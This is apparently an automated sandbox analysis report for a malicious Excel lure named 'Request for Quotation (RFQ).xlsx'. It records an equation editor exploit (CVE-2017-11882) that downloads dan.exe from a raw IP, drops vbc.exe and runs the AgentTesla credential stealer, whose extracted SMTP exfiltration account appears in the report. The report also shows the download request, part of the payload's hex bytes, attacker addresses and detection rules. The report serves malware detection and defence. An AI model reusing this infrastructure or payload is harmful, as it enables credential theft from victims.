Loading ...

Play interactive tourEdit tour

Windows Analysis Report Request for Quotation (RFQ).xlsx

Overview

General Information

Sample Name:Request for Quotation (RFQ).xlsx
Analysis ID:435319
MD5:84c78e6de4ef5f0c45f463953f7974ec
SHA1:3018a8907c25585afb95d899d7e02414c57f87f5
SHA256:2cea67f41e7e4bc7a0d6a29cc9d5ad722e976f51546941abe407a0a9db61e5d9
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2072 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2728 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2904 cmdline: 'C:\Users\Public\vbc.exe' MD5: E123306FCC7FD3C3BDA8993B4F6C43A2)
      • vbc.exe (PID: 2884 cmdline: C:\Users\Public\vbc.exe MD5: E123306FCC7FD3C3BDA8993B4F6C43A2)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "ventas@mftecnologia.com.uyVentas.1us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                4.2.vbc.exe.32e8200.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.vbc.exe.32e8200.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    4.2.vbc.exe.32e8200.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.227.228.121, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2728, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2728, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dan[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2728, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2904
                      Sigma detected: Execution from Suspicious FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2728, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2904

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ventas@mftecnologia.com.uyVentas.1us2.smtp.mailhostbox.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Request for Quotation (RFQ).xlsxMetadefender: Detection: 28%Perma Link
                      Source: Request for Quotation (RFQ).xlsxReversingLabs: Detection: 34%

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: NativeObjectSecurity.pdb( source: vbc.exe, 00000004.00000002.2140067412.0000000000902000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2139065825.0000000000902000.00000020.00020000.sdmp, vbc.exe.2.dr
                      Source: Binary string: NativeObjectSecurity.pdb source: vbc.exe, vbc.exe.2.dr
                      Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.227.228.121:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.227.228.121:80
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:14:31 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 02:35:20 GMTETag: "d2200-5c4d8f11f527c"Accept-Ranges: bytesContent-Length: 860672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 63 c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 da 0c 00 00 46 00 00 00 00 00 00 4e f9 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f9 0c 00 4b 00 00 00 00 00 0d 00 0c 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 b3 f8 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 d9 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 0c 42 00 00 00 00 0d 00 00 44 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 f9 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 00 27 01 00 48 05 01 00 03 00 00 00 01 00 00 06 48 2c 02 00 6b cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 12 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 c5 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 00 00 00 00 38 45 00 00 00 02 16 28 08 00 00 06 20 05 00 00 00 28 06 00 00 06 3a 2f 00 00 00 38 2a 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 19 00 00 00 02 16 28 11 00 00 0a 38 32 00 00 00 20 00 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 10 00 00 00 96 ff ff ff b1 ff ff ff 00 00 00 00 31 00 00 00 c2 ff ff ff 96 ff ff ff 48 00 00 00 38 2c 00 00 00 26 20 04 00 00 00 38 cb ff ff ff 02 16 28 07 00 00 06 28 06 00 00 06 28 05 00 00 06 39 df ff ff ff 26 20 06 00 00 00 38 aa ff ff ff 02 16 28 09 00 00 06 20 02 00 00 00 28 05 00 00 06 3a 94 ff ff ff 26 2a 00 00 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 12 00 00 0a 2a 00 00 56 2b 02 26 16 02 28 14 00 00 06 28 0d 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 0
                      Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                      Source: Joe Sandbox ViewIP Address: 192.227.228.121 192.227.228.121
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                      Source: global trafficHTTP traffic detected: GET /dan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.228.121Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.121
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A8387D5.emfJump to behavior
                      Source: global trafficHTTP traffic detected: GET /dan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.228.121Connection: Keep-Alive
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                      Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://DPosyL.com
                      Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: vbc.exe, 00000005.00000002.2351581799.00000000023F0000.00000004.00000001.sdmpString found in binary or memory: http://MzDfYxjI5Zul5lFh.org
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: vbc.exe, 00000005.00000002.2351030318.00000000008B3000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: vbc.exe, 00000005.00000002.2352850587.000000000520C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2351030318.00000000008B3000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0A
                      Source: vbc.exe, 00000005.00000002.2353179521.0000000005CB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: vbc.exe, 00000004.00000002.2140354304.0000000002191000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: vbc.exe, 00000005.00000002.2354088257.0000000006E60000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: vbc.exe, 00000005.00000002.2351519000.00000000023CA000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: vbc.exe, 00000005.00000002.2353179521.0000000005CB0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: 6A8387D5.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: vbc.exeString found in binary or memory: https://github.com/georgw777/
                      Source: vbc.exeString found in binary or memory: https://github.com/georgw777/MediaManager
                      Source: vbc.exe, 00000004.00000002.2140067412.0000000000902000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2139065825.0000000000902000.00000020.00020000.sdmp, vbc.exe.2.drString found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: vbc.exe, 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b558E043Bu002d0375u002d4F7Eu002dA6B1u002d60EBB83B20C5u007d/u00354970C80u002dE6D6u002d42F4u002d921Cu002d3E2A4D9C1D46.csLarge array initialization: .cctor: array initializer size 11942
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dan[1].exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0046BA68
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0046DAB0
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_00468FC0
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0046543A
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0046E9B0
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0046FBD8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_00462C60
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_00464E40
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0046AEE8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F104D8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F195D7
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F155C8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F14D30
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F15D10
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F15D00
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F14CF8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F104C8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F11060
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F10048
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F19829
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F10006
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F197F4
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F163F8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F163E8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F197C1
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F197CD
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F10FB8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F16B9D
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F16B3A
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F14728
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F102F8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F102E8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F146B7
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F16A98
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F15E76
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F15A60
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F16A49
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F19222
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F15E05
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_0023B8B8
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00235320
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00236340
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00235668
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00232089
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_0023F4C8
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002A5E08
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002AD650
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002A7688
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002A4CE0
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002A9FC0
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002A29D8
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002A9638
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002ADC30
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_002A11A8
                      Source: Request for Quotation (RFQ).xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: dan[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: dan[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: dan[1].exe.2.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
                      Source: dan[1].exe.2.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: 4.2.vbc.exe.900000.1.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.vbc.exe.900000.1.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: 4.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
